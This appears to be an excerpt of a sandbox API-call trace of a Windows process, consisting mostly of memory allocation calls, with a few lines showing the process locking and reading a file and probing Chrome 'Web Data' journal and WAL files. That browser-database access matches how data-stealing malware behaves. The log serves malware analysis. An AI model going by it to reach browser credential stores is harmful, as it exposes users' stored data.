	[0219.195] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2350000
	[0219.195] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2370000
	[0219.195] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2390000
	[0219.196] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x23a0000
	[0219.196] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x23b0000
	[0219.197] VirtualFree (lpAddress=0x23a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.197] VirtualFree (lpAddress=0x2390000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.197] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x2390000
	[0219.197] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x23a0000
	[0219.198] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x23c0000
	[0219.198] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x23d0000
	[0219.198] VirtualFree (lpAddress=0x23c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.199] VirtualFree (lpAddress=0x23a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.199] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x23a0000
	[0219.199] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x23c0000
	[0219.200] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x23e0000
	[0219.200] VirtualQuery (in: lpAddress=0x23e0000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x23e0000, AllocationBase=0x23e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.200] VirtualFree (lpAddress=0x23e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.200] VirtualFree (lpAddress=0x23c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.201] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x23c0000
	[0219.201] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x23e0000
	[0219.201] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x23f0000
	[0219.202] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x2400000
	[0219.202] VirtualAlloc (lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000
	[0219.203] VirtualQuery (in: lpAddress=0x2470000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x2470000, AllocationBase=0x2470000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.203] VirtualFree (lpAddress=0x2470000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.203] VirtualFree (lpAddress=0x2460000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.204] VirtualQuery (in: lpAddress=0x24d0000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x24d0000, AllocationBase=0x24d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.204] VirtualFree (lpAddress=0x24d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.204] VirtualFree (lpAddress=0x24c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.205] VirtualQuery (in: lpAddress=0x2520000, lpBuffer=0x1b5d95c, dwLength=0x1c | out: lpBuffer=0x1b5d95c*(BaseAddress=0x2520000, AllocationBase=0x2520000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.205] VirtualQuery (in: lpAddress=0x2540000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x2540000, AllocationBase=0x2540000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.205] VirtualFree (lpAddress=0x2540000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.205] VirtualFree (lpAddress=0x2530000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.206] VirtualQuery (in: lpAddress=0x2590000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x2590000, AllocationBase=0x2590000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.206] VirtualFree (lpAddress=0x2590000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.206] VirtualFree (lpAddress=0x2580000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.207] ReadFile (in: hFile=0x114, lpBuffer=0x1748a00, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5e040, lpOverlapped=0x1b5e004 | out: lpBuffer=0x1748a00*, lpNumberOfBytesRead=0x1b5e040*=0x800, lpOverlapped=0x1b5e004) returned 1
	[0219.207] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.208] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.208] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.209] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.209] VirtualQuery (in: lpAddress=0x25b0000, lpBuffer=0x1b5d960, dwLength=0x1c | out: lpBuffer=0x1b5d960*(BaseAddress=0x25b0000, AllocationBase=0x25b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.209] VirtualQuery (in: lpAddress=0x25b0000, lpBuffer=0x1b5d95c, dwLength=0x1c | out: lpBuffer=0x1b5d95c*(BaseAddress=0x25b0000, AllocationBase=0x25b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.209] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.210] VirtualFree (lpAddress=0x2670000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.210] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.210] VirtualQuery (in: lpAddress=0x2690000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x2690000, AllocationBase=0x2690000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.210] VirtualFree (lpAddress=0x2690000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.211] VirtualFree (lpAddress=0x2670000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.212] VirtualFree (lpAddress=0x26f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.212] VirtualFree (lpAddress=0x26e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.212] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.213] VirtualFree (lpAddress=0x26f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.213] VirtualFree (lpAddress=0x2730000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.214] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.214] VirtualQuery (in: lpAddress=0x2750000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x2750000, AllocationBase=0x2750000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.214] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.214] VirtualFree (lpAddress=0x2730000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.215] VirtualFree (lpAddress=0x27a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.216] VirtualFree (lpAddress=0x2790000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.216] VirtualFree (lpAddress=0x27c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.217] VirtualFree (lpAddress=0x27a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.217] VirtualQuery (in: lpAddress=0x27f0000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x27f0000, AllocationBase=0x27f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.217] VirtualFree (lpAddress=0x27f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.218] VirtualFree (lpAddress=0x27e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.219] VirtualQuery (in: lpAddress=0x2810000, lpBuffer=0x1b5d960, dwLength=0x1c | out: lpBuffer=0x1b5d960*(BaseAddress=0x2810000, AllocationBase=0x2810000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.219] VirtualQuery (in: lpAddress=0x2810000, lpBuffer=0x1b5d95c, dwLength=0x1c | out: lpBuffer=0x1b5d95c*(BaseAddress=0x2810000, AllocationBase=0x2810000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.219] VirtualFree (lpAddress=0x2810000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.219] VirtualQuery (in: lpAddress=0x2900000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x2900000, AllocationBase=0x2900000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.220] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.220] VirtualFree (lpAddress=0x28f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.221] VirtualFree (lpAddress=0x2950000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.221] VirtualFree (lpAddress=0x2940000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.222] VirtualFree (lpAddress=0x2970000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.222] VirtualFree (lpAddress=0x2950000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.222] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.223] VirtualFree (lpAddress=0x2970000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.223] VirtualQuery (in: lpAddress=0x29b0000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x29b0000, AllocationBase=0x29b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.223] VirtualFree (lpAddress=0x29b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.224] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.225] VirtualFree (lpAddress=0x29f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.225] VirtualFree (lpAddress=0x2a00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.225] VirtualFree (lpAddress=0x29e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.226] VirtualQuery (in: lpAddress=0x2a30000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x2a30000, AllocationBase=0x2a30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.226] VirtualFree (lpAddress=0x2a30000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.226] VirtualFree (lpAddress=0x2a00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.227] VirtualQuery (in: lpAddress=0x2a90000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x2a90000, AllocationBase=0x2a90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.227] VirtualFree (lpAddress=0x2a90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.228] VirtualFree (lpAddress=0x2a80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.229] VirtualFree (lpAddress=0x2ae0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.229] VirtualFree (lpAddress=0x2af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.230] VirtualFree (lpAddress=0x2b00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.230] VirtualQuery (in: lpAddress=0x2b00000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x2b00000, AllocationBase=0x2b00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.230] VirtualFree (lpAddress=0x2b00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.231] VirtualFree (lpAddress=0x2af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.231] VirtualQuery (in: lpAddress=0x2b80000, lpBuffer=0x1b5d92c, dwLength=0x1c | out: lpBuffer=0x1b5d92c*(BaseAddress=0x2b80000, AllocationBase=0x2b80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.231] VirtualFree (lpAddress=0x2af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.232] VirtualFree (lpAddress=0x2b00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.232] VirtualFree (lpAddress=0x2b40000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.233] VirtualFree (lpAddress=0x2b30000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.233] VirtualFree (lpAddress=0x2b50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.233] VirtualQuery (in: lpAddress=0x2b00000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x2b00000, AllocationBase=0x2b00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.234] VirtualFree (lpAddress=0x2b00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.234] VirtualFree (lpAddress=0x2af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.234] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5e008 | out: lpOverlapped=0x1b5e008) returned 1
	[0219.235] VirtualQuery (in: lpAddress=0x2be0000, lpBuffer=0x1b5d9c4, dwLength=0x1c | out: lpBuffer=0x1b5d9c4*(BaseAddress=0x2be0000, AllocationBase=0x2be0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.235] VirtualFree (lpAddress=0x2be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.235] VirtualFree (lpAddress=0x2bd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.236] LockFileEx (in: hFile=0x114, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5eca8 | out: lpOverlapped=0x1b5eca8) returned 1
	[0219.236] LockFileEx (in: hFile=0x114, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5ec94 | out: lpOverlapped=0x1b5ec94) returned 1
	[0219.236] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5ecac | out: lpOverlapped=0x1b5ecac) returned 1
	[0219.236] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0242, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89
	[0219.236] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x2be0000
	[0219.236] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0242, cbMultiByte=-1, lpWideCharStr=0x2be0000, cchWideChar=89 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-journal") returned 89
	[0219.236] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-journal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak-journal"), fInfoLevelId=0x0, lpFileInformation=0x1b5eca0 | out: lpFileInformation=0x1b5eca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.237] GetLastError () returned 0x2
	[0219.237] VirtualFree (lpAddress=0x2be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.237] ReadFile (in: hFile=0x114, lpBuffer=0x1b5ed24, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x1b5ed14, lpOverlapped=0x1b5ecd8 | out: lpBuffer=0x1b5ed24*, lpNumberOfBytesRead=0x1b5ed14*=0x10, lpOverlapped=0x1b5ecd8) returned 1
	[0219.237] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029b, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85
	[0219.237] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x2be0000
	[0219.237] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029b, cbMultiByte=-1, lpWideCharStr=0x2be0000, cchWideChar=85 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-wal") returned 85
	[0219.237] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-wal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak-wal"), fInfoLevelId=0x0, lpFileInformation=0x1b5ecd0 | out: lpFileInformation=0x1b5ecd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.238] GetLastError () returned 0x2
	[0219.238] VirtualFree (lpAddress=0x2be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.238] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x1b5ecec | out: lpFileSizeHigh=0x1b5ecec*=0x0) returned 0x10000
	[0219.238] ReadFile (in: hFile=0x114, lpBuffer=0x1748160, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5ece0, lpOverlapped=0x1b5eca4 | out: lpBuffer=0x1748160*, lpNumberOfBytesRead=0x1b5ece0*=0x800, lpOverlapped=0x1b5eca4) returned 1
	[0219.238] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5ec78 | out: lpOverlapped=0x1b5ec78) returned 1
	[0219.238] CloseHandle (hObject=0x114) returned 1
	[0219.238] VirtualQuery (in: lpAddress=0x1620000, lpBuffer=0x1b5ef74, dwLength=0x1c | out: lpBuffer=0x1b5ef74*(BaseAddress=0x1620000, AllocationBase=0x1620000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.238] VirtualFree (lpAddress=0x1620000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.239] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.239] VirtualFree (lpAddress=0x1640000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.240] VirtualFree (lpAddress=0x1630000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.240] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.240] VirtualFree (lpAddress=0x2b80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.241] VirtualFree (lpAddress=0x2b70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.241] VirtualFree (lpAddress=0x1ae0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.242] VirtualFree (lpAddress=0x1fe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.242] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.242] VirtualFree (lpAddress=0x2130000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.243] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.245] VirtualFree (lpAddress=0x2190000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.245] VirtualFree (lpAddress=0x22d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.245] VirtualFree (lpAddress=0x2a20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.246] VirtualFree (lpAddress=0x2b20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.246] VirtualFree (lpAddress=0x2b60000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.247] VirtualFree (lpAddress=0x2b10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.247] VirtualFree (lpAddress=0x2aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.247] VirtualFree (lpAddress=0x2ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.248] VirtualFree (lpAddress=0x2ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.248] VirtualFree (lpAddress=0x2ab0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.248] VirtualFree (lpAddress=0x2a80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.249] VirtualFree (lpAddress=0x2a90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.249] VirtualFree (lpAddress=0x2a40000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.249] VirtualFree (lpAddress=0x2a60000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.250] VirtualFree (lpAddress=0x2a50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.250] VirtualFree (lpAddress=0x2a00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.250] VirtualFree (lpAddress=0x2a30000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.251] VirtualFree (lpAddress=0x2a10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.251] VirtualFree (lpAddress=0x29c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.251] VirtualFree (lpAddress=0x29e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.252] VirtualFree (lpAddress=0x29d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.252] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.252] VirtualFree (lpAddress=0x29b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.253] VirtualFree (lpAddress=0x2910000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.253] VirtualFree (lpAddress=0x2930000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.253] VirtualFree (lpAddress=0x2960000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.254] VirtualFree (lpAddress=0x2940000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.254] VirtualFree (lpAddress=0x2980000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.254] VirtualFree (lpAddress=0x2950000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.255] VirtualFree (lpAddress=0x29a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.255] VirtualFree (lpAddress=0x2920000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.255] VirtualFree (lpAddress=0x28f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.256] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.256] VirtualFree (lpAddress=0x2800000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.256] VirtualFree (lpAddress=0x2820000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.257] VirtualFree (lpAddress=0x2830000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.257] VirtualFree (lpAddress=0x2840000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.257] VirtualFree (lpAddress=0x2850000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.258] VirtualFree (lpAddress=0x2860000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.258] VirtualFree (lpAddress=0x2870000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.258] VirtualFree (lpAddress=0x2880000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.259] VirtualFree (lpAddress=0x2890000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.259] VirtualFree (lpAddress=0x2810000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.259] VirtualFree (lpAddress=0x28b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.260] VirtualFree (lpAddress=0x28c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.260] VirtualFree (lpAddress=0x28d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.260] VirtualFree (lpAddress=0x28a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.261] VirtualFree (lpAddress=0x27e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.261] VirtualFree (lpAddress=0x27f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.261] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.261] VirtualFree (lpAddress=0x2780000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.262] VirtualFree (lpAddress=0x27b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.262] VirtualFree (lpAddress=0x2790000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.262] VirtualFree (lpAddress=0x27d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.263] VirtualFree (lpAddress=0x27a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.263] VirtualFree (lpAddress=0x2770000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.263] VirtualFree (lpAddress=0x2730000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.264] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.264] VirtualFree (lpAddress=0x26a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.264] VirtualFree (lpAddress=0x26c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.265] VirtualFree (lpAddress=0x26d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.265] VirtualFree (lpAddress=0x2700000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.265] VirtualFree (lpAddress=0x26e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.265] VirtualFree (lpAddress=0x2720000, dwSize=0x0, dwFreeType=0x8000) returned 1
